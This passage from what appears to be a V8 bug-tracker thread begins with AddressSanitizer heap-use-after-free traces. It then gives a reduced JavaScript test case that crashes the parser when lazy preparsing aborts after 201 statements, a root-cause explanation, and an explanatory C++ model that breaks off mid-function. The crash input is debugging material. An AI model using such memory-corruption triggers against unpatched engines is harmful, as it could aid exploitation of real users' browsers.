    #15 0x555cd12d9e19 in v8::internal::ParserBase<v8::internal::Parser>::ParseArguments(v8::internal::Scanner::Location*, bool, bool*) src/parsing/parser-base.h:2756:9
    #16 0x555cd12d31cf in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3332:18
    #17 0x555cd131935e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
    #18 0x555cd1315592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #19 0x555cd1313b21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #20 0x555cd1310f17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #21 0x555cd1264388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
    #22 0x555cd12be295 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionCoverGrammar(bool, bool*) src/parsing/parser-base.h:2018:15
    #23 0x555cd12f48c0 in ParseExpression src/parsing/parser-base.h:1983:24
    #24 0x555cd12f48c0 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionOrLabelledStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:5146
    #25 0x555cd12e59bd in v8::internal::ParserBase<v8::internal::Parser>::ParseStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:4987:14
    #26 0x555cd12b303e in v8::internal::ParserBase<v8::internal::Parser>::ParseStatementList(v8::internal::ZoneList<v8::internal::Statement*>*, int, bool, bool*) src/parsing/parser-base.h:4792:9
    #27 0x555cd1245fec in ParseStatementList src/parsing/parser-base.h:1263:32
    #28 0x555cd1245fec in v8::internal::Parser::DoParseProgram(v8::internal::ParseInfo*) src/parsing/parser.cc:709
    #29 0x555cd124496b in v8::internal::Parser::ParseProgram(v8::internal::Isolate*, v8::internal::ParseInfo*) src/parsing/parser.cc:612:14
    #30 0x555cd131fcb2 in v8::internal::parsing::ParseProgram(v8::internal::ParseInfo*, v8::internal::Isolate*, bool) src/parsing/parsing.cc:29:19
    #31 0x555cd0619ae2 in v8::internal::(anonymous namespace)::CompileToplevel(v8::internal::CompilationInfo*) src/compiler.cc:1064:12
    #32 0x555cd061dd80 in v8::internal::Compiler::GetSharedFunctionInfoForScript(v8::internal::Handle<v8::internal::String>, v8::internal::Handle<v8::internal::Object>, int, int, v8::ScriptOriginOptions, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Context>, v8::Extension*, v8::internal::ScriptData**, v8::ScriptCompiler::CompileOptions, v8::internal::NativesFlag) src/compiler.cc:1622:14

previously allocated by thread T0 here:
    #0 0x555cd02bd873 in __interceptor_malloc (/usr/local/google/home/petermarshall/v8/out/x64.release/d8+0x51f873)
    #1 0x555cd18c69b9 in AllocateSegment src/zone/accounting-allocator.cc:85:18
    #2 0x555cd18c69b9 in v8::internal::AccountingAllocator::GetSegment(unsigned long) src/zone/accounting-allocator.cc:75
    #3 0x555cd18c7345 in NewSegment src/zone/zone.cc:116:33
    #4 0x555cd18c7345 in v8::internal::Zone::NewExpand(unsigned long) src/zone/zone.cc:164
    #5 0x555cd18c71cb in v8::internal::Zone::New(unsigned long) src/zone/zone.cc:79:14
    #6 0x555cd1232027 in New src/zone/zone.h:139:43
    #7 0x555cd1232027 in NewData src/list.h:183
    #8 0x555cd1232027 in Initialize src/list.h:172
    #9 0x555cd1232027 in List src/list.h:39
    #10 0x555cd1232027 in ZoneList src/zone/zone.h:157
    #11 0x555cd1232027 in v8::internal::FuncNameInferrer::FuncNameInferrer(v8::internal::AstValueFactory*, v8::internal::Zone*) src/parsing/func-name-inferrer.cc:18
    #12 0x555cd1254c1b in DiscardableZoneScope src/parsing/parser.cc:114:9
    #13 0x555cd1254c1b in v8::internal::Parser::ParseFunctionLiteral(v8::internal::AstRawString const*, v8::internal::Scanner::Location, v8::internal::FunctionNameValidity, v8::internal::FunctionKind, int, v8::internal::FunctionLiteral::FunctionType, v8::internal::LanguageMode, bool*) src/parsing/parser.cc:2712
    #14 0x555cd12c9be8 in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectPropertyDefinition(v8::internal::ParserBase<v8::internal::Parser>::ObjectLiteralChecker*, bool*, bool*, bool*) src/parsing/parser-base.h:2617:35
    #15 0x555cd12bc27a in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectLiteral(bool*) src/parsing/parser-base.h:2698:39
    #16 0x555cd12b4a5d in v8::internal::ParserBase<v8::internal::Parser>::ParsePrimaryExpression(bool*, bool*) src/parsing/parser-base.h:1902:14
    #17 0x555cd12dfae0 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberExpression(bool*, bool*) src/parsing/parser-base.h:3537:14
    #18 0x555cd12d8936 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberWithNewPrefixesExpression(bool*, bool*) src/parsing/parser-base.h:3459:10
    #19 0x555cd12d1616 in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3264:7
    #20 0x555cd131935e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
    #21 0x555cd1315592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #22 0x555cd1313b21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #23 0x555cd1310f17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #24 0x555cd1264388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
    #25 0x555cd12d9e19 in v8::internal::ParserBase<v8::internal::Parser>::ParseArguments(v8::internal::Scanner::Location*, bool, bool*) src/parsing/parser-base.h:2756:9
    #26 0x555cd12d31cf in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3332:18
    #27 0x555cd131935e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
    #28 0x555cd1315592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #29 0x555cd1313b21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #30 0x555cd1310f17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #31 0x555cd1264388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
    #32 0x555cd12be295 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionCoverGrammar(bool, bool*) src/parsing/parser-base.h:2018:15
    #33 0x555cd12f48c0 in ParseExpression src/parsing/parser-base.h:1983:24
    #34 0x555cd12f48c0 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionOrLabelledStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:5146
    #35 0x555cd12e59bd in v8::internal::ParserBase<v8::internal::Parser>::ParseStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:4987:14
    #36 0x555cd12b303e in v8::internal::ParserBase<v8::internal::Parser>::ParseStatementList(v8::internal::ZoneList<v8::internal::Statement*>*, int, bool, bool*) src/parsing/parser-base.h:4792:9
    #37 0x555cd1245fec in ParseStatementList src/parsing/parser-base.h:1263:32
    #38 0x555cd1245fec in v8::internal::Parser::DoParseProgram(v8::internal::ParseInfo*) src/parsing/parser.cc:709
    #39 0x555cd124496b in v8::internal::Parser::ParseProgram(v8::internal::Isolate*, v8::internal::ParseInfo*) src/parsing/parser.cc:612:14

SUMMARY: AddressSanitizer: heap-use-after-free src/ast/scopes.h:1018:9 in NullifyRareVariableIf<(lambda at ../../src/ast/scopes.cc:2261:25)>
Shadow bytes around the buggy address:
  0x0c4a7fffa820: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa830: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa840: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa850: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa860: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c4a7fffa870: fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd
  0x0c4a7fffa880: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa890: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==37066==ABORTING
➜  v8 git:(master) out/x64.release/d8 ~/test.js
=================================================================
==37276==ERROR: AddressSanitizer: heap-use-after-free on address 0x6250000143e0 at pc 0x56267d47a0e0 bp 0x7ffc59fe1d30 sp 0x7ffc59fe1d28
READ of size 8 at 0x6250000143e0 thread T0
    #0 0x56267d47a0df in NullifyRareVariableIf<(lambda at ../../src/ast/scopes.cc:2261:25)> src/ast/scopes.h:1018:9
    #1 0x56267d47a0df in v8::internal::DeclarationScope::AllocateLocals() src/ast/scopes.cc:2260
    #2 0x56267d4753ee in AllocateNonParameterLocalsAndDeclaredGlobals src/ast/scopes.cc:2240:27
    #3 0x56267d4753ee in v8::internal::Scope::AllocateVariablesRecursively() src/ast/scopes.cc:2304
    #4 0x56267d475267 in v8::internal::Scope::AllocateVariablesRecursively() src/ast/scopes.cc:2290:12
    #5 0x56267d46ded2 in v8::internal::DeclarationScope::AllocateVariables(v8::internal::ParseInfo*, v8::internal::Isolate*, v8::internal::AnalyzeMode) src/ast/scopes.cc:1337:3
    #6 0x56267d46d916 in v8::internal::DeclarationScope::Analyze(v8::internal::ParseInfo*, v8::internal::Isolate*, v8::internal::AnalyzeMode) src/ast/scopes.cc:673:10
    #7 0x56267d62bf5b in v8::internal::Compiler::Analyze(v8::internal::ParseInfo*, v8::internal::Isolate*, v8::internal::ThreadedList<v8::internal::ThreadedListZoneEntry<v8::internal::FunctionLiteral*> >*) src/compiler.cc:1133:3
    #8 0x56267d63e4e7 in Analyze src/compiler.cc:1143:10
    #9 0x56267d63e4e7 in v8::internal::(anonymous namespace)::CompileUnoptimizedCode(v8::internal::CompilationInfo*, v8::internal::ConcurrencyMode) src/compiler.cc:552
    #10 0x56267d633984 in v8::internal::(anonymous namespace)::CompileToplevel(v8::internal::CompilationInfo*) src/compiler.cc:1098:10
    #11 0x56267d637d80 in v8::internal::Compiler::GetSharedFunctionInfoForScript(v8::internal::Handle<v8::internal::String>, v8::internal::Handle<v8::internal::Object>, int, int, v8::ScriptOriginOptions, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Context>, v8::Extension*, v8::internal::ScriptData**, v8::ScriptCompiler::CompileOptions, v8::internal::NativesFlag) src/compiler.cc:1622:14
    #12 0x56267d367543 in v8::ScriptCompiler::CompileUnboundInternal(v8::Isolate*, v8::ScriptCompiler::Source*, v8::ScriptCompiler::CompileOptions) src/api.cc:2241:14
    #13 0x56267d368ac6 in v8::ScriptCompiler::Compile(v8::Local<v8::Context>, v8::ScriptCompiler::Source*, v8::ScriptCompiler::CompileOptions) src/api.cc:2300:16
    #14 0x56267d3067d8 in v8::Shell::CompileString(v8::Isolate*, v8::Local<v8::String>, v8::Local<v8::Value>, v8::ScriptCompiler::CompileOptions) src/d8.cc:536:12
    #15 0x56267d306bdb in v8::Shell::ExecuteString(v8::Isolate*, v8::Local<v8::String>, v8::Local<v8::Value>, bool, bool) src/d8.cc:572:10
    #16 0x56267d31b883 in v8::SourceGroup::Execute(v8::Isolate*) src/d8.cc:2344:10
    #17 0x56267d321f76 in v8::Shell::RunMain(v8::Isolate*, int, char**, bool) src/d8.cc:2774:34
    #18 0x56267d3255c0 in v8::Shell::Main(int, char**) src/d8.cc:3224:16
    #19 0x7f3bcc26ef44 in __libc_start_main /build/eglibc-SvCtMH/eglibc-2.19/csu/libc-start.c:287

0x6250000143e0 is located 736 bytes inside of 8192-byte region [0x625000014100,0x625000016100)
freed by thread T0 here:
    #0 0x56267d2d7532 in __interceptor_free (/usr/local/google/home/petermarshall/v8/out/x64.release/d8+0x51f532)
    #1 0x56267e8e106e in DeleteAll src/zone/zone.cc:104:17
    #2 0x56267e8e106e in v8::internal::Zone::~Zone() src/zone/zone.cc:60
    #3 0x56267e26fe6b in v8::internal::Parser::ParseFunctionLiteral(v8::internal::AstRawString const*, v8::internal::Scanner::Location, v8::internal::FunctionNameValidity, v8::internal::FunctionKind, int, v8::internal::FunctionLiteral::FunctionType, v8::internal::LanguageMode, bool*) src/parsing/parser.cc:2802:3
    #4 0x56267e2e3be8 in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectPropertyDefinition(v8::internal::ParserBase<v8::internal::Parser>::ObjectLiteralChecker*, bool*, bool*, bool*) src/parsing/parser-base.h:2617:35
    #5 0x56267e2d627a in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectLiteral(bool*) src/parsing/parser-base.h:2698:39
    #6 0x56267e2cea5d in v8::internal::ParserBase<v8::internal::Parser>::ParsePrimaryExpression(bool*, bool*) src/parsing/parser-base.h:1902:14
    #7 0x56267e2f9ae0 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberExpression(bool*, bool*) src/parsing/parser-base.h:3537:14
    #8 0x56267e2f2936 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberWithNewPrefixesExpression(bool*, bool*) src/parsing/parser-base.h:3459:10
    #9 0x56267e2eb616 in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3264:7
    #10 0x56267e33335e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
    #11 0x56267e32f592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #12 0x56267e32db21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #13 0x56267e32af17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #14 0x56267e27e388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
    #15 0x56267e2f3e19 in v8::internal::ParserBase<v8::internal::Parser>::ParseArguments(v8::internal::Scanner::Location*, bool, bool*) src/parsing/parser-base.h:2756:9
    #16 0x56267e2ed1cf in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3332:18
    #17 0x56267e33335e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
    #18 0x56267e32f592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #19 0x56267e32db21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #20 0x56267e32af17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #21 0x56267e27e388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
    #22 0x56267e2d8295 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionCoverGrammar(bool, bool*) src/parsing/parser-base.h:2018:15
    #23 0x56267e30e8c0 in ParseExpression src/parsing/parser-base.h:1983:24
    #24 0x56267e30e8c0 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionOrLabelledStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:5146
    #25 0x56267e2ff9bd in v8::internal::ParserBase<v8::internal::Parser>::ParseStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:4987:14
    #26 0x56267e2cd03e in v8::internal::ParserBase<v8::internal::Parser>::ParseStatementList(v8::internal::ZoneList<v8::internal::Statement*>*, int, bool, bool*) src/parsing/parser-base.h:4792:9
    #27 0x56267e25ffec in ParseStatementList src/parsing/parser-base.h:1263:32
    #28 0x56267e25ffec in v8::internal::Parser::DoParseProgram(v8::internal::ParseInfo*) src/parsing/parser.cc:709
    #29 0x56267e25e96b in v8::internal::Parser::ParseProgram(v8::internal::Isolate*, v8::internal::ParseInfo*) src/parsing/parser.cc:612:14
    #30 0x56267e339cb2 in v8::internal::parsing::ParseProgram(v8::internal::ParseInfo*, v8::internal::Isolate*, bool) src/parsing/parsing.cc:29:19
    #31 0x56267d633ae2 in v8::internal::(anonymous namespace)::CompileToplevel(v8::internal::CompilationInfo*) src/compiler.cc:1064:12
    #32 0x56267d637d80 in v8::internal::Compiler::GetSharedFunctionInfoForScript(v8::internal::Handle<v8::internal::String>, v8::internal::Handle<v8::internal::Object>, int, int, v8::ScriptOriginOptions, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Context>, v8::Extension*, v8::internal::ScriptData**, v8::ScriptCompiler::CompileOptions, v8::internal::NativesFlag) src/compiler.cc:1622:14

previously allocated by thread T0 here:
    #0 0x56267d2d7873 in __interceptor_malloc (/usr/local/google/home/petermarshall/v8/out/x64.release/d8+0x51f873)
    #1 0x56267e8e09b9 in AllocateSegment src/zone/accounting-allocator.cc:85:18
    #2 0x56267e8e09b9 in v8::internal::AccountingAllocator::GetSegment(unsigned long) src/zone/accounting-allocator.cc:75
    #3 0x56267e8e1345 in NewSegment src/zone/zone.cc:116:33
    #4 0x56267e8e1345 in v8::internal::Zone::NewExpand(unsigned long) src/zone/zone.cc:164
    #5 0x56267e8e11cb in v8::internal::Zone::New(unsigned long) src/zone/zone.cc:79:14
    #6 0x56267e24c027 in New src/zone/zone.h:139:43
    #7 0x56267e24c027 in NewData src/list.h:183
    #8 0x56267e24c027 in Initialize src/list.h:172
    #9 0x56267e24c027 in List src/list.h:39
    #10 0x56267e24c027 in ZoneList src/zone/zone.h:157
    #11 0x56267e24c027 in v8::internal::FuncNameInferrer::FuncNameInferrer(v8::internal::AstValueFactory*, v8::internal::Zone*) src/parsing/func-name-inferrer.cc:18
    #12 0x56267e26ec1b in DiscardableZoneScope src/parsing/parser.cc:114:9
    #13 0x56267e26ec1b in v8::internal::Parser::ParseFunctionLiteral(v8::internal::AstRawString const*, v8::internal::Scanner::Location, v8::internal::FunctionNameValidity, v8::internal::FunctionKind, int, v8::internal::FunctionLiteral::FunctionType, v8::internal::LanguageMode, bool*) src/parsing/parser.cc:2712
    #14 0x56267e2e3be8 in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectPropertyDefinition(v8::internal::ParserBase<v8::internal::Parser>::ObjectLiteralChecker*, bool*, bool*, bool*) src/parsing/parser-base.h:2617:35
    #15 0x56267e2d627a in v8::internal::ParserBase<v8::internal::Parser>::ParseObjectLiteral(bool*) src/parsing/parser-base.h:2698:39
    #16 0x56267e2cea5d in v8::internal::ParserBase<v8::internal::Parser>::ParsePrimaryExpression(bool*, bool*) src/parsing/parser-base.h:1902:14
    #17 0x56267e2f9ae0 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberExpression(bool*, bool*) src/parsing/parser-base.h:3537:14
    #18 0x56267e2f2936 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberWithNewPrefixesExpression(bool*, bool*) src/parsing/parser-base.h:3459:10
    #19 0x56267e2eb616 in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3264:7
    #20 0x56267e33335e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
    #21 0x56267e32f592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #22 0x56267e32db21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #23 0x56267e32af17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #24 0x56267e27e388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
    #25 0x56267e2f3e19 in v8::internal::ParserBase<v8::internal::Parser>::ParseArguments(v8::internal::Scanner::Location*, bool, bool*) src/parsing/parser-base.h:2756:9
    #26 0x56267e2ed1cf in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression(bool*) src/parsing/parser-base.h:3332:18
    #27 0x56267e33335e in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression(bool*) src/parsing/parser-base.h:3234:28
    #28 0x56267e32f592 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression(bool*) src/parsing/parser-base.h:3223:12
    #29 0x56267e32db21 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression(int, bool, bool*) src/parsing/parser-base.h:3099:19
    #30 0x56267e32af17 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression(bool, bool*) src/parsing/parser-base.h:3065:28
    #31 0x56267e27e388 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression(bool, bool*) src/parsing/parser-base.h:2846:18
    #32 0x56267e2d8295 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionCoverGrammar(bool, bool*) src/parsing/parser-base.h:2018:15
    #33 0x56267e30e8c0 in ParseExpression src/parsing/parser-base.h:1983:24
    #34 0x56267e30e8c0 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionOrLabelledStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:5146
    #35 0x56267e2ff9bd in v8::internal::ParserBase<v8::internal::Parser>::ParseStatement(v8::internal::ZoneList<v8::internal::AstRawString const*>*, v8::internal::AllowLabelledFunctionStatement, bool*) src/parsing/parser-base.h:4987:14
    #36 0x56267e2cd03e in v8::internal::ParserBase<v8::internal::Parser>::ParseStatementList(v8::internal::ZoneList<v8::internal::Statement*>*, int, bool, bool*) src/parsing/parser-base.h:4792:9
    #37 0x56267e25ffec in ParseStatementList src/parsing/parser-base.h:1263:32
    #38 0x56267e25ffec in v8::internal::Parser::DoParseProgram(v8::internal::ParseInfo*) src/parsing/parser.cc:709
    #39 0x56267e25e96b in v8::internal::Parser::ParseProgram(v8::internal::Isolate*, v8::internal::ParseInfo*) src/parsing/parser.cc:612:14

SUMMARY: AddressSanitizer: heap-use-after-free src/ast/scopes.h:1018:9 in NullifyRareVariableIf<(lambda at ../../src/ast/scopes.cc:2261:25)>
Shadow bytes around the buggy address:
  0x0c4a7fffa820: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa830: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa840: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa850: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa860: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c4a7fffa870: fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd
  0x0c4a7fffa880: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa890: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c4a7fffa8c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==37276==ABORTING

Status: Started
Reduced test case:

({
   m() {
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x;
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; x; 
     // Reference 201:
     x;
   }
})  

The magic number 201 is due to:

  // Under some circumstances, we allow preparsing to abort if the preparsed
  // function is "long and trivial", and fully parse instead. Our current
  // definition of "long and trivial" is:
  // - over kLazyParseTrialLimit statements
  // - all starting with an identifier (i.e., no if, for, while, etc.)
  static const int kLazyParseTrialLimit = 200;

So this crashes when we abort lazy parsing. Still digging into why that happens.
Got it, we were missing rare_data_ nullification after aborting. CL on the way.
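The root cause described in the comments above (Scope state, including `rare_data_`, left pointing into the temporary preparse zone after preparsing is aborted and that zone is discarded) is an instance of a general rule for arena or zone allocators: every pointer into a zone must be cleared when the zone is. The following is an added C++ model written for this page, not V8's code; `Zone`, `Scope`, `RareData`, `SetZone`, `ResetAfterPreparsing`, `AllocateLocals` and `SegmentRegistry` are simplified stand-ins for the real classes, and the `null_rare_data` flag exists only so the buggy and fixed reset paths can be run side by side. The stale pointer is detected by address bookkeeping rather than by dereferencing freed memory.

```cpp
#include <cstddef>
#include <cstdint>
#include <new>
#include <set>
#include <utility>

constexpr size_t kSegmentSize = 4096;

// Hypothetical helper: address ranges owned by live zones, so the demo can
// tell that a pointer refers to a destroyed zone without touching freed
// memory (a real dereference would be undefined behaviour; ASan reports it
// as heap-use-after-free, as in the report above).
class SegmentRegistry {
 public:
  static void Add(const void* start, size_t size) {
    Ranges().insert({reinterpret_cast<uintptr_t>(start), size});
  }
  static void Remove(const void* start, size_t size) {
    Ranges().erase({reinterpret_cast<uintptr_t>(start), size});
  }
  static bool IsLive(const void* p) {
    uintptr_t a = reinterpret_cast<uintptr_t>(p);
    for (const auto& r : Ranges())
      if (a >= r.first && a < r.first + r.second) return true;
    return false;
  }
 private:
  static std::set<std::pair<uintptr_t, size_t>>& Ranges() {
    static std::set<std::pair<uintptr_t, size_t>> ranges;
    return ranges;
  }
};

// Toy bump allocator: everything allocated in a Zone dies with the Zone.
class Zone {
 public:
  Zone() : segment_(new unsigned char[kSegmentSize]), used_(0) {
    SegmentRegistry::Add(segment_, kSegmentSize);
  }
  ~Zone() {
    SegmentRegistry::Remove(segment_, kSegmentSize);
    delete[] segment_;
  }
  Zone(const Zone&) = delete;
  Zone& operator=(const Zone&) = delete;
  void* New(size_t size) {
    size = (size + 7) & ~static_cast<size_t>(7);  // 8-byte alignment
    if (used_ + size > kSegmentSize) return nullptr;
    void* p = segment_ + used_;
    used_ += size;
    return p;
  }
 private:
  unsigned char* segment_;
  size_t used_;
};

// Rarely needed per-scope data, allocated lazily in the scope's current zone.
struct RareData {
  int declared_global_count = 0;
};

class Scope {
 public:
  enum class Status { kOk, kDanglingRareData };
  explicit Scope(Zone* zone) : zone_(zone), rare_data_(nullptr) {}
  // While preparsing, the scope allocates in a temporary zone.
  void SetZone(Zone* zone) { zone_ = zone; }
  RareData* EnsureRareData() {
    if (rare_data_ == nullptr)
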